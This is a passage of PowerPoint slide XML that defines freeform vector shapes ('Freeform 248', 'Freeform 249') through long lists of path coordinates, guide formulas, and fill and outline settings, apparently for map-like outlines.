                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="210"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36115" name="Freeform 248"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2469" y="2496"/>
                <a:ext cx="193" cy="210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 71 w 193"/>
                  <a:gd name="T1" fmla="*/ 203 h 210"/>
                  <a:gd name="T2" fmla="*/ 62 w 193"/>
                  <a:gd name="T3" fmla="*/ 193 h 210"/>
                  <a:gd name="T4" fmla="*/ 59 w 193"/>
                  <a:gd name="T5" fmla="*/ 187 h 210"/>
                  <a:gd name="T6" fmla="*/ 53 w 193"/>
                  <a:gd name="T7" fmla="*/ 185 h 210"/>
                  <a:gd name="T8" fmla="*/ 43 w 193"/>
                  <a:gd name="T9" fmla="*/ 179 h 210"/>
                  <a:gd name="T10" fmla="*/ 35 w 193"/>
                  <a:gd name="T11" fmla="*/ 177 h 210"/>
                  <a:gd name="T12" fmla="*/ 13 w 193"/>
                  <a:gd name="T13" fmla="*/ 180 h 210"/>
                  <a:gd name="T14" fmla="*/ 10 w 193"/>
                  <a:gd name="T15" fmla="*/ 179 h 210"/>
                  <a:gd name="T16" fmla="*/ 16 w 193"/>
                  <a:gd name="T17" fmla="*/ 163 h 210"/>
                  <a:gd name="T18" fmla="*/ 15 w 193"/>
                  <a:gd name="T19" fmla="*/ 146 h 210"/>
                  <a:gd name="T20" fmla="*/ 9 w 193"/>
                  <a:gd name="T21" fmla="*/ 135 h 210"/>
                  <a:gd name="T22" fmla="*/ 12 w 193"/>
                  <a:gd name="T23" fmla="*/ 130 h 210"/>
                  <a:gd name="T24" fmla="*/ 12 w 193"/>
                  <a:gd name="T25" fmla="*/ 118 h 210"/>
                  <a:gd name="T26" fmla="*/ 5 w 193"/>
                  <a:gd name="T27" fmla="*/ 109 h 210"/>
                  <a:gd name="T28" fmla="*/ 0 w 193"/>
                  <a:gd name="T29" fmla="*/ 112 h 210"/>
                  <a:gd name="T30" fmla="*/ 0 w 193"/>
                  <a:gd name="T31" fmla="*/ 107 h 210"/>
                  <a:gd name="T32" fmla="*/ 3 w 193"/>
                  <a:gd name="T33" fmla="*/ 102 h 210"/>
                  <a:gd name="T34" fmla="*/ 57 w 193"/>
                  <a:gd name="T35" fmla="*/ 103 h 210"/>
                  <a:gd name="T36" fmla="*/ 63 w 193"/>
                  <a:gd name="T37" fmla="*/ 103 h 210"/>
                  <a:gd name="T38" fmla="*/ 62 w 193"/>
                  <a:gd name="T39" fmla="*/ 82 h 210"/>
                  <a:gd name="T40" fmla="*/ 64 w 193"/>
                  <a:gd name="T41" fmla="*/ 74 h 210"/>
                  <a:gd name="T42" fmla="*/ 73 w 193"/>
                  <a:gd name="T43" fmla="*/ 68 h 210"/>
                  <a:gd name="T44" fmla="*/ 80 w 193"/>
                  <a:gd name="T45" fmla="*/ 65 h 210"/>
                  <a:gd name="T46" fmla="*/ 81 w 193"/>
                  <a:gd name="T47" fmla="*/ 27 h 210"/>
                  <a:gd name="T48" fmla="*/ 85 w 193"/>
                  <a:gd name="T49" fmla="*/ 22 h 210"/>
                  <a:gd name="T50" fmla="*/ 132 w 193"/>
                  <a:gd name="T51" fmla="*/ 22 h 210"/>
                  <a:gd name="T52" fmla="*/ 133 w 193"/>
                  <a:gd name="T53" fmla="*/ 14 h 210"/>
                  <a:gd name="T54" fmla="*/ 153 w 193"/>
                  <a:gd name="T55" fmla="*/ 12 h 210"/>
                  <a:gd name="T56" fmla="*/ 193 w 193"/>
                  <a:gd name="T57" fmla="*/ 39 h 210"/>
                  <a:gd name="T58" fmla="*/ 166 w 193"/>
                  <a:gd name="T59" fmla="*/ 40 h 210"/>
                  <a:gd name="T60" fmla="*/ 173 w 193"/>
                  <a:gd name="T61" fmla="*/ 108 h 210"/>
                  <a:gd name="T62" fmla="*/ 176 w 193"/>
                  <a:gd name="T63" fmla="*/ 132 h 210"/>
                  <a:gd name="T64" fmla="*/ 179 w 193"/>
                  <a:gd name="T65" fmla="*/ 171 h 210"/>
                  <a:gd name="T66" fmla="*/ 186 w 193"/>
                  <a:gd name="T67" fmla="*/ 188 h 210"/>
                  <a:gd name="T68" fmla="*/ 137 w 193"/>
                  <a:gd name="T69" fmla="*/ 200 h 210"/>
                  <a:gd name="T70" fmla="*/ 116 w 193"/>
                  <a:gd name="T71" fmla="*/ 202 h 210"/>
                  <a:gd name="T72" fmla="*/ 110 w 193"/>
                  <a:gd name="T73" fmla="*/ 202 h 210"/>
                  <a:gd name="T74" fmla="*/ 101 w 193"/>
                  <a:gd name="T75" fmla="*/ 200 h 210"/>
                  <a:gd name="T76" fmla="*/ 101 w 193"/>
                  <a:gd name="T77" fmla="*/ 204 h 210"/>
                  <a:gd name="T78" fmla="*/ 97 w 193"/>
                  <a:gd name="T79" fmla="*/ 205 h 210"/>
                  <a:gd name="T80" fmla="*/ 91 w 193"/>
                  <a:gd name="T81" fmla="*/ 198 h 210"/>
                  <a:gd name="T82" fmla="*/ 87 w 193"/>
                  <a:gd name="T83" fmla="*/ 198 h 210"/>
                  <a:gd name="T84" fmla="*/ 84 w 193"/>
                  <a:gd name="T85" fmla="*/ 204 h 210"/>
                  <a:gd name="T86" fmla="*/ 81 w 193"/>
                  <a:gd name="T87" fmla="*/ 210 h 210"/>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93"/>
                  <a:gd name="T133" fmla="*/ 0 h 210"/>
                  <a:gd name="T134" fmla="*/ 193 w 193"/>
                  <a:gd name="T135" fmla="*/ 210 h 210"/>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93" h="210">
                    <a:moveTo>
                      <a:pt x="81" y="210"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="210"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36116" name="Freeform 249"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3069" y="1374"/>
                <a:ext cx="168" cy="380"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 168"/>
                  <a:gd name="T1" fmla="*/ 68 h 380"/>
                  <a:gd name="T2" fmla="*/ 134 w 168"/>
                  <a:gd name="T3" fmla="*/ 86 h 380"/>
                  <a:gd name="T4" fmla="*/ 142 w 168"/>
                  <a:gd name="T5" fmla="*/ 109 h 380"/>
                  <a:gd name="T6" fmla="*/ 140 w 168"/>
                  <a:gd name="T7" fmla="*/ 154 h 380"/>
                  <a:gd name="T8" fmla="*/ 141 w 168"/>
                  <a:gd name="T9" fmla="*/ 190 h 380"/>
                  <a:gd name="T10" fmla="*/ 143 w 168"/>
                  <a:gd name="T11" fmla="*/ 212 h 380"/>
                  <a:gd name="T12" fmla="*/ 152 w 168"/>
                  <a:gd name="T13" fmla="*/ 243 h 380"/>
                  <a:gd name="T14" fmla="*/ 149 w 168"/>
                  <a:gd name="T15" fmla="*/ 258 h 380"/>
                  <a:gd name="T16" fmla="*/ 167 w 168"/>
                  <a:gd name="T17" fmla="*/ 277 h 380"/>
                  <a:gd name="T18" fmla="*/ 164 w 168"/>
                  <a:gd name="T19" fmla="*/ 297 h 380"/>
                  <a:gd name="T20" fmla="*/ 136 w 168"/>
                  <a:gd name="T21" fmla="*/ 334 h 380"/>
                  <a:gd name="T22" fmla="*/ 114 w 168"/>
                  <a:gd name="T23" fmla="*/ 358 h 380"/>
                  <a:gd name="T24" fmla="*/ 101 w 168"/>
                  <a:gd name="T25" fmla="*/ 360 h 380"/>
                  <a:gd name="T26" fmla="*/ 92 w 168"/>
                  <a:gd name="T27" fmla="*/ 363 h 380"/>
                  <a:gd name="T28" fmla="*/ 90 w 168"/>
                  <a:gd name="T29" fmla="*/ 364 h 380"/>
                  <a:gd name="T30" fmla="*/ 81 w 168"/>
                  <a:gd name="T31" fmla="*/ 367 h 380"/>
                  <a:gd name="T32" fmla="*/ 74 w 168"/>
                  <a:gd name="T33" fmla="*/ 370 h 380"/>
                  <a:gd name="T34" fmla="*/ 66 w 168"/>
                  <a:gd name="T35" fmla="*/ 372 h 380"/>
                  <a:gd name="T36" fmla="*/ 58 w 168"/>
                  <a:gd name="T37" fmla="*/ 379 h 380"/>
                  <a:gd name="T38" fmla="*/ 50 w 168"/>
                  <a:gd name="T39" fmla="*/ 377 h 380"/>
                  <a:gd name="T40" fmla="*/ 38 w 168"/>
                  <a:gd name="T41" fmla="*/ 380 h 380"/>
                  <a:gd name="T42" fmla="*/ 35 w 168"/>
                  <a:gd name="T43" fmla="*/ 368 h 380"/>
                  <a:gd name="T44" fmla="*/ 26 w 168"/>
                  <a:gd name="T45" fmla="*/ 365 h 380"/>
                  <a:gd name="T46" fmla="*/ 15 w 168"/>
                  <a:gd name="T47" fmla="*/ 361 h 380"/>
                  <a:gd name="T48" fmla="*/ 10 w 168"/>
                  <a:gd name="T49" fmla="*/ 342 h 380"/>
                  <a:gd name="T50" fmla="*/ 12 w 168"/>
                  <a:gd name="T51" fmla="*/ 326 h 380"/>
                  <a:gd name="T52" fmla="*/ 9 w 168"/>
                  <a:gd name="T53" fmla="*/ 303 h 380"/>
                  <a:gd name="T54" fmla="*/ 4 w 168"/>
                  <a:gd name="T55" fmla="*/ 293 h 380"/>
                  <a:gd name="T56" fmla="*/ 11 w 168"/>
                  <a:gd name="T57" fmla="*/ 279 h 380"/>
                  <a:gd name="T58" fmla="*/ 14 w 168"/>
                  <a:gd name="T59" fmla="*/ 268 h 380"/>
                  <a:gd name="T60" fmla="*/ 24 w 168"/>
                  <a:gd name="T61" fmla="*/ 268 h 380"/>
                  <a:gd name="T62" fmla="*/ 28 w 168"/>
                  <a:gd name="T63" fmla="*/ 249 h 380"/>
                  <a:gd name="T64" fmla="*/ 44 w 168"/>
                  <a:gd name="T65" fmla="*/ 236 h 380"/>
                  <a:gd name="T66" fmla="*/ 66 w 168"/>
                  <a:gd name="T67" fmla="*/ 209 h 380"/>
                  <a:gd name="T68" fmla="*/ 71 w 168"/>
                  <a:gd name="T69" fmla="*/ 202 h 380"/>
                  <a:gd name="T70" fmla="*/ 71 w 168"/>
                  <a:gd name="T71" fmla="*/ 187 h 380"/>
                  <a:gd name="T72" fmla="*/ 54 w 168"/>
                  <a:gd name="T73" fmla="*/ 172 h 380"/>
                  <a:gd name="T74" fmla="*/ 47 w 168"/>
                  <a:gd name="T75" fmla="*/ 163 h 380"/>
                  <a:gd name="T76" fmla="*/ 49 w 168"/>
                  <a:gd name="T77" fmla="*/ 132 h 380"/>
                  <a:gd name="T78" fmla="*/ 42 w 168"/>
                  <a:gd name="T79" fmla="*/ 98 h 380"/>
                  <a:gd name="T80" fmla="*/ 34 w 168"/>
                  <a:gd name="T81" fmla="*/ 75 h 380"/>
                  <a:gd name="T82" fmla="*/ 6 w 168"/>
                  <a:gd name="T83" fmla="*/ 53 h 380"/>
                  <a:gd name="T84" fmla="*/ 7 w 168"/>
                  <a:gd name="T85" fmla="*/ 30 h 380"/>
                  <a:gd name="T86" fmla="*/ 20 w 168"/>
                  <a:gd name="T87" fmla="*/ 42 h 380"/>
                  <a:gd name="T88" fmla="*/ 40 w 168"/>
                  <a:gd name="T89" fmla="*/ 57 h 380"/>
                  <a:gd name="T90" fmla="*/ 64 w 168"/>
                  <a:gd name="T91" fmla="*/ 65 h 380"/>
                  <a:gd name="T92" fmla="*/ 78 w 168"/>
                  <a:gd name="T93" fmla="*/ 39 h 380"/>
                  <a:gd name="T94" fmla="*/ 84 w 168"/>
                  <a:gd name="T95" fmla="*/ 11 h 380"/>
                  <a:gd name="T96" fmla="*/ 109 w 168"/>
                  <a:gd name="T97" fmla="*/ 0 h 380"/>
                  <a:gd name="T98" fmla="*/ 126 w 168"/>
                  <a:gd name="T99" fmla="*/ 11 h 380"/>
                  <a:gd name="T100" fmla="*/ 126 w 168"/>
                  <a:gd name="T101" fmla="*/ 42 h 380"/>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168"/>
                  <a:gd name="T154" fmla="*/ 0 h 380"/>
                  <a:gd name="T155" fmla="*/ 168 w 168"/>
                  <a:gd name="T156" fmla="*/ 380 h 380"/>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168" h="380">
                    <a:moveTo>
                      <a:pt x="125" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="125" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="368"/>
